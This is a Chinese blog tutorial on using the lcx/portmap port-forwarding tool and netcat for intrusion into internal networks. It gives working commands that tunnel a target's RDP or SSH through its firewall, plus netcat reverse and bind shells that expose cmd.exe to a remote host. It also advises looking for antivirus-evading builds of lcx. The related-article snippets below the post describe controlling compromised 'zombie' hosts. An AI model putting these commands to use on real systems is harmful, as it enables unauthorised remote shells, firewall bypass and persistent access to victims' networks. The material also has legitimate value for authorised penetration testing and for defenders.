端口转发lcx工具+nc反弹工具使用

最新推荐文章于 2024-05-09 08:13:56 发布
最新推荐文章于 2024-05-09 08:13:56 发布
阅读量1.7k 收藏 10
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46062722/article/details/114087624
版权

一、lcx工具

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,

Windows版使用方法如下:

1、 lcx 内网端口转发

本机IP:192.168.1.10 目标机IP:192.168.1.5
本机运行: lcx -listen 3333 2222
在这里插入图片描述
目标机运行:lcx -slave 192.168.1.10 3333 192.168.1.5 3389
将192.168.1.5的3389端口映射给192.168.1.10的3333端口

在本机上远程桌面连接127.0.0.1(本机自己)的2222端口,就可连接到目标机的3389端口。
在这里插入图片描述

从第三台机器上连接本机(192.168.1.10)的2222端口,也可以连接到目标机的3389端口。
查看本机和目标机器,可以看到,目标机器主动连接本机的3333端口,这样就绕开了目标机上的防火墙。
即使目标机器上的防火墙阻隔了3389端口,由于是目标机主动连接本机,穿透防火墙。

2、本地端口转发

-tran参数的用法
目标机上运行:lcx -tran 3333 127.0.0.1 3389
在这里插入图片描述

在主机上运行远程桌面,连接目标机的53端口,可以连接到主机的3389端口。
目标机上运行:lcx -tran 3333 192.168.125.102 3389 其中192.168.125.102是第三台机。
在主机上运行远程桌面,连接目标机的3333端口,可以连接到第三台机的3389端口。
在这里插入图片描述

由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口,
目标主机上执行:
lcx -tran 53 目标主机ip 3389
这时我们可以直接远程桌面连接到到 目标主机IP:53

注:软件可能会被杀软查杀,可自行寻找免杀版本。

Linux版使用方法:

在这里插入图片描述

例如:
先在具有公网ip的主机上执行:
./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777
意思是监听来自6666端口的请求,将其转发到7777端口
在这里插入图片描述

再在内网主机上执行:
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666
意思就是将内网主机22端口的流量转发到公网主机的6666端口。
在这里插入图片描述

然后在Linux系统命令行下执行
ssh 公网主机ip 7777
即可连接内网主机。
在这里插入图片描述

另一种方法(-m 1):貌似像windows中的反向代理
./portmap -m 1 -p1 转发的公网端口 -h2 内网地址 -p2 内网服务端口
在本机主机上执行:
./portmap -m 1 -p1 5555 -h2 192.168.1.13 -p2 22
192.168.1.13为内网地址
在这里插入图片描述

验证
在这里插入图片描述

成功

二、nc工具反弹

反向连接

首先进行在公网主机监听:
nc -lvvp 4444
在这里插入图片描述

其次在内网主机上执行
nc -t -e cmd.exe 公网ip 4444
在这里插入图片描述

反弹成功
在这里插入图片描述

正向连接

在内网主机执行:
nc -l -p 4444 -t -e cmd.exe
在这里插入图片描述

在公网主机执行:
nc -vv ip(靶机地址)4444、、成功获取shell
在这里插入图片描述

-vv相当于参数的复用
-v 参数可以将一些关于连接建立信息输出到标准错误。-v参数多出现几次,则显示的信息会更多一些。如果-v参数没有出现,则NetCat将默默地工作,至到出现错误为止。

DF。
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
lcx 工具学习
rnn0921的博客
08-17 376
意思是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。Lcx -slave <你的 ip> <监听端口(对应 listen 的第一个参数)> <目标 ip> <目标端口>Lcx -Listen <监听 slave 请求的端口(对应 slave 的第二个参数)> <等待连接的端口>Lcx -tran <等待连接的端口> <目标 ip> <目标端口>(1)端口转发(listen 和 slave 成对使用)5、lcx 内网端口转发,内网穿透。将安装目录加入环境变量。
内网端口转发LCX工具使用(附内网环境实现)
markecheng的博客
12-02 2585
前言 端口转发是进行内网安全攻防的一个比较基础的知识,今天介绍的是最为经典的端口转发工具LCX LCX简介 LCX是一个基于Socket套接字的端口转发工具,有windows版本以及linux版本。 环境实现 我们今天的环境很简单,是两台windows的机器,1台位本机windows10 (IP:192.168.206.1)一台是web服务器(IP:192.168.206.129),拓扑图如下: 我在WEB服务器上使用phpstudy安装了一个CMS,开启的是80端口;如图 我们在本机上访问web服务
最新内网渗透之传输层隧道搭建_内网隧道工具lcx(4),2024年最新深入浅出网络安全性能调优
最新发布
2401_84266016的博客
05-09 786
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。
lcx端口转发工具使用
qq_33411563的博客
12-13 7979
Linux版lcx端口转发工具使用 0x01 前言 在实际情况中,web应用服务通常会被运行在内网机器上,然后通过端口映射到外网,供外网用户进行访问。如果我们已经攻破网站,拿到内网机器权限,通常会安装反弹木马到自己的外网主机,然后在外网主机进行操作。但是,这样操作就会变得很繁琐,需要从自己的内网机登陆到外网主机,然后控制外网主机来对肉鸡进行操作。而lcx端口转发工具可以帮助我们减轻一些负担
流量映射端口反弹lcx,ew)
wjq18827615690的博客
01-31 738
转载自西梅哥的有道云:https://note.youdao.com/ynoteshare1/index.html?id=a6bf797cce0b6087cb78b44818dca69f&type=note 内网应用 一、端口转发工具: 1.LCX(支持双系统) A、window(LCX) 上传一些内网主机探测的工具 ms17010(适合08,07) 1.首先安装lcx(正向连接) 在内网主机:转发:lcx.exe–slave公网主机ip公网主机端口内网主机ip内网...
远程桌面连接:使用lcx进行端口转发
qiuqiunile_的博客
09-18 2439
一、lcx介绍 lcx是一个基于Socket套接字实现的端口转发工具,有Linux和Windows两个版本。比如说,当目标机器开放了3389端口,我们可以将目标机器的3389端口转发到我们自己的外网主机上的某个端口,然后我们在本地机访问外网主机的端口,进而在本地连接到目标机器的远程终端并进行管理。 二、准备 一个Socket隧道必须具备两端: 服务端(外网机):监听端口 客户端(目标机):传入服务端的ip地址和端口 这边我们使用vps(虚拟专用服务器)作为服务端。 三、具体步骤 目标机器 1、查看338
lcx端口转发工具
04-11
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.
lcx端口内网转发工具
07-14
lcx端口转发
lcx.exe 端口转发工具
08-23
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389. 用法:如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip ...
windows端口转发工具LCX
dl71181的博客
07-22 2252
端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端口。这里我就用工具LcxLcx.exe是一个端口转发工具,相当于把肉鸡A上的3389端口转发到具有外网IP地址的...
lcx修改版,端口转发工具,内网端口转外网
04-28
内网打洞工具,原理同lcx,但是更强大,方便。
NCrar.rar 反弹工具
10-20
NCrar.rar 反弹工具 网络应用 内网入侵必备~~
Windows下nc命令工具下载
10-26
netcat 1.11 for Win32/Win64, windows nc命令
lcx工具,包括arm9和win版本
11-17
包含网上找到的lcx源码,该源码arm-linux(v5TE)和cygwin编译版本,还有lcx.exe在windows下的原版,使用方法参考命令帮助;可远程使用telnet、ssh等。
渗透测试13---代理原理与技术
初遇我ㄖ寸の热情呢?
04-14 7823
代理原理与技术 正向代理,反向代理 nc里面的是正向连接(隐藏访问者),反向连接(隐藏服务器)。 正向代理就是隐藏访问者,通过正向代理访问外面的服务器,外面的的服务器里面得到日志不能区分真正的访问者,只知道是代理服务器的的地址(隐身的作用) 反向代理就是隐藏自己的服务器,公司里面会有很多服务器,不想暴露自己,隐藏在一个代理服务器之后。别人也不知道我真实的台数,也不知道我真实的ip是啥,也...
lcx使用方法
一个安全研究员
07-27 9564
如题
端口反弹工具lcx代码
kimqcn的专栏
01-11 958
#include #include #include #pragma comment(lib, "ws2_32.lib")#define SERVERNAME "itrusPorter"#define VERSION "v1.2"#define MAXBUFSIZE 8192#define ADDRSIZE 32struct SOCKINFO{ SOCKET ClientSock;
内网转发之lcx-反弹端口
broing55的博客
03-17 360
实验环境:win2008r2 服务器,win2003服务器,本机 虚拟机防火墙开启,本地计算机关闭防火墙和杀毒软件 配置网络 win2008 双网卡,一个外网 自动获取ip ,另一个网卡为vmnet1 设置IP为10.1.1.1,远程桌面打开 win2003网卡也为vmnet1 设置ip'为10.1.1.2,并开启远程桌面连接 利用win2008作为转发机器,使用lcx...
端口转发工具lcx流量特征
05-17
LCX是一种常用的端口转发工具,它可以在本地和远程主机之间建立TCP连接,并将数据在连接之间转发。由于LCX转发的是TCP流量,因此其流量特征如下: 1. TCP协议:LCX是基于TCP协议的端口转发工具,因此其流量中只会有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值